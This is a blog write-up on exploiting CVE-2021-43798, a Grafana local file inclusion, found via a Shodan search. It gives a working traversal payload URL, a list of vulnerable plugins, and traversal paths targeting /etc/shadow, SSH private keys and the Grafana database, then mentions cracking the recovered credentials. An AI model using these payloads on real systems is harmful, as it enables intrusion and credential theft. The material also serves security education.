From Shodan Dork to Grafana 📊Local File Inclusion

Published in

InfoSec Write-ups

4 min readNov 11, 2022

Hi readers 📖, This is my new article on local file inclusion I found using shodan recon and further exploiting grafana service.

In the end, I will also provide a video POC link from my youtube channel, which will help you to understand this more clearly.

let's get started,

for the grafana-related services I used simple shodan dork

“title:grafana hostname:target” you can also use http.title:grafana

as a result, I got one grafana service running on the target IP.

you can further use ipinfo.io to gather more information related to IP addresses.

Now the grafana was running on port 3000 which is common for this service, as usual, I check for default credentials but they don’t work for me.

further, I found the service was running on version v8.0.4, then I looked up available CVEs for the version and I found the version is vulnerable to LFI vulnerability.

you can check the version in the bottom details in below sample screenshot it is 9.2.3, but in my case, the version was 8.0.4.

NOTE: LFI vulnerability affects Grafana 8.0.0-beta1 to 8.3.0

a little intro to LFI:

An attacker can use Local File Inclusion (LFI) to trick the web application into exposing or running files on the web server. An LFI attack may lead to information disclosure, remote code execution, or even Cross Site Scripting. Typically, LFI occurs when an application uses the path to a file as input. If the application treats this input as trusted, a local file may be used in the include statement.

So, let's come to the topic,

now it was vulnerable to CVE-2021–43798 you can read/check details related to this CVE at https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43798 .

manually , I found LFI at the path /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd on plugin alert list

then the full path becomes /public/plugins/alertlist/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd/

payload: http://target_ip:3000/public/plugins/alertlist/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd/

result:

but there can be a lot of plugins such as

alertlist
annolist
grafana-azure-monitor-datasource
barchart
bargauge
cloudwatch
dashlist
elasticsearch
gauge
geomap
gettingstarted
stackdriver
graph
graphite
heatmap
histogram

and more……….

plus there can be more paths other than /etc/passwd we may miss other sensitive information if somehow /etc/passwd doesn’t work

for example:

/..%2f..%2f..%2f..%2f..%2fconf/defaults.ini
/..%2f..%2f..%2f..%2f..%2fconf/grafana.ini
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/grafana/grafana.ini
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/grafana/defaults.ini
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/shadow
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome/grafana/.bash_history
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome/grafana/.ssh/id_rsa
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2froot/.bash_history
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2froot/.ssh/id_rsa
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fusr/local/etc/grafana/grafana.ini
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fvar/lib/grafana/grafana.db
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fproc/net/fib_trie
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fproc/net/tcp
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fproc/self/cmdline

So manually, finding each case with the respective plugin is a lengthy process so you can make your own script to automate the task,

Further to automate the attack I used a tool made specifically for this CVE on GitHub https://github.com/pedrohavay/exploit-grafana-CVE-2021-43798

as I already said we can find more sensitive information on another path as well as found in the defaults.ini path, further I was able to crack credentials with the help of the above-mentioned tool, alternatively, you can use other tools to crack the key like hashcat or john the ripper.